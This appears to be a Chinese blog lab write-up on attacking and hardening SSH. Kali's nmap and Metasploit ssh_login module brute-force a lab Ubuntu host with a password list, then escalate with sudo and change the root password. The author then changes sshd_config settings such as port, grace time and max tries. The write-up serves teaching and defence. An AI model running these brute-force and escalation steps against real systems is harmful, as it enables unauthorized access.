-
网络安全: Kali Linux 进行 SSH 渗透与防御
目录
一、实验
1.环境
(1)主机
表1 主机
系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态)
Ubuntu 8.04 192.168.204.143 Kali(2022.4)的目标主机 (2)查看Kali Linux (2022.4)系统版本
cat /etc/os-release
(3) 查看Kali Linux (2022.4)系统IP地址
ip addr | grep 154
(4)查看Ubuntu 8.04 系统版本及IP地址
lsb_release -a
ip addr
2.nmap扫描目标主机
(1)扫描⽬标主机所在⽹段所有存活的主机
nmap -sP 192.168.204.0/24
(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本
22端口已开放
nmap -sV 192.168.204.143
3.Kali Linux 进行 SSH 渗透
(1)进入MSF 控制台
msfconsole
(2) 搜索 ssh_login脚本
search ssh_login
(3) 使⽤编号为 0 的脚本
use 0
(4) 设置⽬标主机
set rhosts 192.168.204.143
(4)查看选项
show options
(5)设置用户名与密码本
set username msfadmin
set pass_file zidian.txt
(6)运⾏脚本
run
(7)查看会话
sessions
(8)连接会话
sessions 1
查看用户身份
whoami
查看路径
pwd
提升权限
sudo -i
再次查看用户身份
whoami
更改密码
password root
(9)MobaXterm远程连接
连接
3.Kali Linux 进行 SSH 防御
(1)SSH安全配置(端口)
vim /etc/ssh/sshd_config
修改端口
(2)重启
/etc/init.d/ssh restart
(3)退出之前的MSF
(5)进入MSF 控制台
msfconsole
(6) 搜索 ssh_login脚本
search ssh_login
(6) 使⽤编号为 0 的脚本
use 0
(7) 设置⽬标主机
set rhosts 192.168.204.143
(8)设置用户名与密码本
set username msfadmin
set pass_file zidian.txt
(9)运⾏脚本
失败
run
(10)nmap扫描端口
ssh端口为12345
nmap -sV 192.168.204.143
(11)查看选项
show options
(12) 设置目标端口
set rport 12345
(13)运⾏脚本
run
( 14)SSH安全配置(端口)
vim /etc/ssh/sshd_config修改登录验证时间
(15)重启
/etc/init.d/ssh restart(16)验证(等待1分钟)
(17)SSH安全配置(容错次数)
vim /etc/ssh/sshd_config修改容错次数
(18)重启
/etc/init.d/ssh restart(19)容错2次
二、问题
1.SSH有哪些安全配置
(1)配置
- Port 12345 //端口
- LoginGraceTime 1m //登录验证耗时
- PermitRootLogin no //不允许root远程登录
- MaxAuthTries 2 //最大容错次数2
- AllowUsers msfadmin@192.168.204.100 //允许指定用户在指定IP上登录
2.MSF 退出报错
(1)报错
[*] You have active sessions open, to exit anyway type "exit -y"
(2)原因分析
有session会话正在运行。
(3)解决方法
exit -y
-
相关阅读:
信息学奥赛一本通:1178:成绩排序
mysql中自定义变量(浅显易懂简洁版)
《操作系统真象还原》 第 01 章 部署工作环境 学习笔记
向NS-3添加新模块_ns3.35添加新模块_ns3.35以及更早版本添加新模块
GEO生信数据挖掘(七)差异基因分析
【OpenCV 例程300篇】249. 图像的重映射(cv2.remap)
近2万签名的句子网络签名ACCESS\EXCEL数据库
Mysql 入门篇之二进制安装
python报错 UnicodeDecodeError
【分布式计算】java消息队列机制
- 原文地址:https://blog.csdn.net/cronaldo91/article/details/136507797